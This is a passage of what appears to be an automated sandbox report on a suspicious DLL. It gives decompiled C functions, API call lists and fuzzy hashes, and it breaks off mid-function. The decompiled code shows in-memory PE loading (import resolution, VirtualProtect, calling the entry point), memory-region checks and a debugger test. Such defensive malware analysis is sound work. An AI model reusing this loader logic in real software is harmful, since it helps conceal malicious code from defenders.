0x6d4a1c69
0x6d4a1c71
0x6d4a1c73
0x6d4a1c73
0x6d4a1c71
0x6d4a1c83
0x6d4a1c83
0x6d4a1c8e

APIs

StrStrIA.KERNELBASE(00000000,6D4A1810,?,6D4A1810,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A1C69
HeapFree.KERNEL32(00000000,?,?,6D4A1810,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A1C83

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7f31ccc1b7e13511088e931df51c3a3fa7066c630c5a4e09c479e8b6eb5a521f
Instruction ID: 283282b685d23ef6adc3cca2629fa186114ff0d2c6d60b4127befc533c364467
Opcode Fuzzy Hash: 7f31ccc1b7e13511088e931df51c3a3fa7066c630c5a4e09c479e8b6eb5a521f
Instruction Fuzzy Hash: D401D472904115EBCB00DBE5CC44FAF7BBDAB99240F190166E605E310CEB30DE018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E05CE, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,6D509094), ref: 6D4E0600

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9d90d7339efea6e21cab9ece21dbe664486656cc8ef95d83d5e8a8c95e15f6a6
Instruction ID: 51c7e8b5d2fd299db9de045e71e7cb45cc8e0bec746be348182be3b97761fdb9
Opcode Fuzzy Hash: 9d90d7339efea6e21cab9ece21dbe664486656cc8ef95d83d5e8a8c95e15f6a6
Instruction Fuzzy Hash: BBE06531189116BBEB22AB774C05F5B7B58AF823F2F2A4125ED7896291DF64CC4182E4

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6D4A1236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6d4a41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4a41cc - 0x63698bc4 &  !( *0x6d4a41cc - 0x63698bc4);
				_t18 = E6D4A1AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4a41cc - 0x63698bc4 &  !( *0x6d4a41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6d4a41cc - 0x63698bc4 &  !( *0x6d4a41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6D4A14DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6D4A1F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6D4A1030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6D4A136A(_t42);
					L8:
					return _t29;
				}
			}

0x6d4a123e
0x6d4a1240
0x6d4a125c
0x6d4a126d
0x6d4a1274
0x6d4a12d2
0x00000000
0x6d4a1276
0x6d4a1276
0x6d4a1280
0x6d4a1284
0x6d4a1289
0x6d4a128c
0x6d4a1291
0x6d4a1295
0x6d4a129a
0x6d4a129f
0x6d4a12a3
0x6d4a12a8
0x6d4a12a9
0x6d4a12ad
0x6d4a12b2
0x6d4a12ba
0x6d4a12ba
0x6d4a12b2
0x6d4a12a3
0x6d4a1295
0x6d4a12bc
0x6d4a12c5
0x6d4a12c9
0x6d4a12d3
0x6d4a12d9
0x6d4a12d9

APIs

Part of subcall function 6D4A1AA5: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D4A1272,?,?,?,?), ref: 6D4A1AC9
Part of subcall function 6D4A1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1AEB
Part of subcall function 6D4A1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B01
Part of subcall function 6D4A1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B17
Part of subcall function 6D4A1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B2D
Part of subcall function 6D4A1AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B43

Part of subcall function 6D4A14DE: memcpy.NTDLL(?,?,?,?,?,?,?,?,6D4A1280,?,?,?,?,?,?), ref: 6D4A150B
Part of subcall function 6D4A14DE: memcpy.NTDLL(?,?,?), ref: 6D4A153E

Part of subcall function 6D4A1F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D4A1F69

Part of subcall function 6D4A1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D4A1069
Part of subcall function 6D4A1030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D4A10DE
Part of subcall function 6D4A1030: GetLastError.KERNEL32 ref: 6D4A10E4

GetLastError.KERNEL32(?,?,?,?,?), ref: 6D4A12B4

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: d2610aee29bd4fccd9f6203438f6c963035b30cca8d0d89189f93c0a913c47ab
Instruction ID: 05bde3a824b672685f59aaf8054f778b77d13de90aa61af8df24a3732e0b9c95
Opcode Fuzzy Hash: d2610aee29bd4fccd9f6203438f6c963035b30cca8d0d89189f93c0a913c47ab
Instruction Fuzzy Hash: D9110B776047166BD7119AA9CC80D9F77BCAFA8244709015DEA01E7649E7A0ED0647E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4A2485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4A2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d4a41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d4a4240 = 1;
										__eflags =  *0x6d4a4240;
										if( *0x6d4a4240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d4a41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d4a4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d4a41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d4a4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d4a41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d4a4240 = 1;
							__eflags =  *0x6d4a4240;
							if( *0x6d4a4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d4a4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d4a4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d4a41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d4a4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d4a248f
0x6d4a2492
0x6d4a2498
0x6d4a24b6
0x00000000
0x6d4a24b6
0x6d4a24a0
0x6d4a24a9
0x6d4a24af
0x6d4a24be
0x6d4a24c1
0x6d4a24c4
0x6d4a24ce
0x6d4a24ce
0x6d4a24d0
0x6d4a24d3
0x6d4a24d5
0x6d4a24d5
0x6d4a24d7
0x6d4a24da
0x00000000
0x00000000
0x6d4a24dc
0x6d4a24de
0x6d4a2544
0x6d4a2544
0x6d4a26a2
0x00000000
0x6d4a26a2
0x6d4a24e0
0x6d4a24e0
0x6d4a24e4
0x6d4a24e6
0x6d4a24e6
0x6d4a24e6
0x6d4a24e6
0x6d4a24e9
0x6d4a24ea
0x6d4a24ed
0x6d4a24ed
0x6d4a24f1
0x6d4a24f5
0x6d4a2503
0x6d4a2503
0x6d4a250b
0x6d4a2511
0x6d4a2513
0x6d4a2515
0x6d4a2525
0x6d4a2532
0x6d4a2536
0x6d4a253b
0x6d4a253d
0x6d4a25bb
0x6d4a25bb
0x6d4a253f
0x6d4a253f
0x6d4a253f
0x6d4a25bd
0x6d4a25bf
0x6d4a26a0
0x6d4a26a0
0x00000000
0x6d4a25c5
0x6d4a25c5
0x6d4a25cc
0x00000000
0x00000000
0x6d4a25d2
0x6d4a25d6
0x6d4a2632
0x6d4a2634
0x6d4a263c
0x6d4a263e
0x6d4a2640
0x00000000
0x00000000
0x6d4a2642
0x6d4a2648
0x6d4a264a
0x6d4a264c
0x6d4a2661
0x6d4a2661
0x6d4a2663
0x6d4a2692
0x6d4a2699
0x00000000
0x6d4a2699
0x6d4a2667
0x6d4a2668
0x6d4a266a
0x6d4a266c
0x6d4a266c
0x6d4a266e
0x6d4a2670
0x6d4a2672
0x6d4a2686
0x6d4a2686
0x6d4a2689
0x6d4a268b
0x6d4a268b
0x6d4a268c
0x6d4a268c
0x00000000
0x6d4a2674
0x6d4a2674
0x6d4a2674
0x6d4a267d
0x6d4a267e
0x6d4a2680
0x6d4a2682
0x6d4a2682
0x00000000
0x6d4a2674
0x6d4a2672
0x6d4a264e
0x6d4a2655
0x6d4a2655
0x6d4a2657
0x00000000
0x00000000
0x6d4a2659
0x6d4a265a
0x6d4a265d
0x6d4a265f
0x00000000
0x00000000
0x00000000
0x6d4a265f
0x00000000
0x6d4a2655
0x6d4a25d8
0x6d4a25db
0x6d4a25e0
0x00000000
0x00000000
0x6d4a25e9
0x6d4a25eb
0x6d4a25f1
0x00000000
0x00000000
0x6d4a25f7
0x6d4a25fd
0x00000000
0x00000000
0x6d4a2603
0x6d4a2605
0x6d4a260e
0x6d4a2612
0x00000000
0x00000000
0x6d4a2618
0x6d4a261b
0x6d4a261d
0x00000000
0x00000000
0x6d4a2624
0x6d4a2626
0x00000000
0x00000000
0x6d4a2628
0x6d4a262c
0x00000000
0x00000000
0x00000000
0x6d4a262c
0x00000000
0x00000000
0x00000000
0x6d4a2517
0x6d4a2517
0x6d4a2517
0x6d4a251e
0x00000000
0x00000000
0x6d4a2520
0x6d4a2521
0x6d4a2523
0x00000000
0x00000000
0x00000000
0x6d4a2523
0x6d4a254b
0x6d4a254d
0x00000000
0x00000000
0x6d4a255d
0x6d4a255f
0x6d4a2561
0x00000000
0x00000000
0x6d4a2567
0x6d4a256e
0x6d4a259a
0x6d4a259a
0x6d4a259c
0x6d4a259e
0x6d4a25b2
0x6d4a25b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4a25a0
0x6d4a25a0
0x6d4a25a0
0x6d4a25a9
0x6d4a25aa
0x6d4a25ac
0x6d4a25ae
0x6d4a25ae
0x00000000
0x6d4a25a0
0x6d4a2570
0x6d4a2573
0x6d4a2575
0x6d4a2587
0x6d4a2587
0x6d4a258a
0x6d4a258c
0x6d4a258c
0x6d4a258d
0x6d4a258d
0x6d4a2593
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4a2577
0x6d4a2577
0x6d4a2577
0x6d4a257e
0x00000000
0x00000000
0x6d4a2580
0x6d4a2580
0x6d4a2581
0x00000000
0x00000000
0x00000000
0x6d4a2581
0x6d4a2583
0x6d4a2585
0x6d4a2598
0x00000000
0x00000000
0x00000000
0x6d4a2598
0x00000000
0x6d4a2585
0x6d4a24f7
0x6d4a24fa
0x6d4a24fd
0x00000000
0x00000000
0x6d4a24ff
0x6d4a2501
0x00000000
0x00000000
0x00000000
0x6d4a2501
0x6d4a24c6
0x6d4a24c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D4A2536

Strings

@BJm, xrefs: 6D4A2637
@BJm, xrefs: 6D4A2694
@BJm, xrefs: 6D4A2555

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: @BJm$@BJm$@BJm
API String ID: 2850889275-1318342603
Opcode ID: c5f51647050d90068b394787c68fecf0d1ea6fc0f3444ecb2b81f2877f9dcf37
Instruction ID: bbc75d6e9cf2fb32769a06ec55b9b8d3f7eeb9abaa686bb92af8c51e1d9a5f53
Opcode Fuzzy Hash: c5f51647050d90068b394787c68fecf0d1ea6fc0f3444ecb2b81f2877f9dcf37
Instruction Fuzzy Hash: 9461B6316055139FD729CE2AC4E0F6973B5BBA6358B7CA529D41AC738CEF30DC42A650

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4A146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d4a41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d4a41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d4a41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d4a41a8 = _t5;
					 *0x6d4a41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d4a41a4 = _t6;
					if(_t6 == 0) {
						 *0x6d4a41a4 =  *0x6d4a41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6d4a146d
0x6d4a147b
0x6d4a1483
0x6d4a1488
0x6d4a14d2
0x6d4a14d2
0x6d4a148a
0x6d4a1492
0x6d4a14ce
0x6d4a14d0
0x6d4a1494
0x6d4a1494
0x6d4a1499
0x6d4a14a7
0x6d4a14ac
0x6d4a14b2
0x6d4a14ba
0x6d4a14bf
0x6d4a14c1
0x6d4a14c1
0x6d4a14cb
0x6d4a14cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D4A17B8,73B763F0,00000000), ref: 6D4A147B
GetVersion.KERNEL32 ref: 6D4A148A
GetCurrentProcessId.KERNEL32 ref: 6D4A1499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D4A14B2

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 59a88a65ca1745311ebea2b96c84900032ce39e052b14f05c6be413b7e224e37
Instruction ID: eda44519351a8360e73d6235e52c08616c64ffcc00d9da2e082b819e802b760f
Opcode Fuzzy Hash: 59a88a65ca1745311ebea2b96c84900032ce39e052b14f05c6be413b7e224e37
Instruction Fuzzy Hash: B5F0FF716482219EEF50AFA8A82DB5D3FB4B72A751F2C4129E11DD51CCE770CC418B54

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DEACE, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6D4DEBC6
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6D4DEBD0
UnhandledExceptionFilter.KERNEL32(6D4DB0C1,?,?,?,?,?,00000001), ref: 6D4DEBDD

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f54ae30610d43e3bf9790ba6a7facdc9490c752ecb15a68e514af473d8d79408
Instruction ID: 57ce090d4175ca2f1862330b540c1ee06a3be06a01cb2b3b13cf20ab0a887b9e
Opcode Fuzzy Hash: f54ae30610d43e3bf9790ba6a7facdc9490c752ecb15a68e514af473d8d79408
Instruction Fuzzy Hash: 4131B27490122DABCF61DF28D888B8DBBB8BF48310F5041EAE51DA7250EB709F858F55

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DF1BF, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6D4DF1BE,?,?,?,?,?,6D4E47D4), ref: 6D4DF1E1
TerminateProcess.KERNEL32(00000000,?,6D4DF1BE,?,?,?,?,?,6D4E47D4), ref: 6D4DF1E8
ExitProcess.KERNEL32 ref: 6D4DF1FA

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 6df1f5f9248aa4990f534f2bbdd813480d53adc53466a510e9f7baea7681f5df
Instruction ID: 063dd0c7505a21c84c41a7b2afd50a5769ec96433a07bbf1462e0a35159375a9
Opcode Fuzzy Hash: 6df1f5f9248aa4990f534f2bbdd813480d53adc53466a510e9f7baea7681f5df
Instruction Fuzzy Hash: 93E0B631005148BBCFA16B64C918F5D3B79FF81351B164418FA09C6221CB36EE91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E69B1, Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D4E69AC,?,?,00000008,?,?,6D4E6644,00000000), ref: 6D4E6BDE

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 407170107d2bf3e6f5b030eab5aa7cab52a3da01691fb6fdca6c6ed54e07f3d8
Instruction ID: ce66a08e188ac601e5eab7516f536d1a839782220bd8f51731e2f0e9b412b749
Opcode Fuzzy Hash: 407170107d2bf3e6f5b030eab5aa7cab52a3da01691fb6fdca6c6ed54e07f3d8
Instruction Fuzzy Hash: FEB14B31610605AFD715CF18C486F657BA0FF453A5F258A58EAA9CF2A1C335ED92CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DBB69, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D4DBB7F

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5c04538e21500da2e665f2d32362b49bf2f2d6b9d43368d7ef7e6f3822e4d093
Instruction ID: de340a586b45caa4f0ab2f533d83ec4cd1c6734ae1c9ee30b4cec771790950ab
Opcode Fuzzy Hash: 5c04538e21500da2e665f2d32362b49bf2f2d6b9d43368d7ef7e6f3822e4d093
Instruction Fuzzy Hash: 09516AB1E142168BEF15CF65C8A2BAABBF0FB49714F21842AC429EB345D7749901CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0B15, Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08501fc4b38c6f5a89ae0cf944445c2b9a59c8c8fa62e69b1313c7a117d4f231
Instruction ID: 5b3c5e4f4d7dcc9d570fd51dd6a4a350a8c2694bbf874e1717e4ca55d11c8321
Opcode Fuzzy Hash: 08501fc4b38c6f5a89ae0cf944445c2b9a59c8c8fa62e69b1313c7a117d4f231
Instruction Fuzzy Hash: 7941B2B1C0821DAEDB14DF6ACC88EAABBB9AF45345F1442DDE55DE3200DA349E858F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A2264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6D4A2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
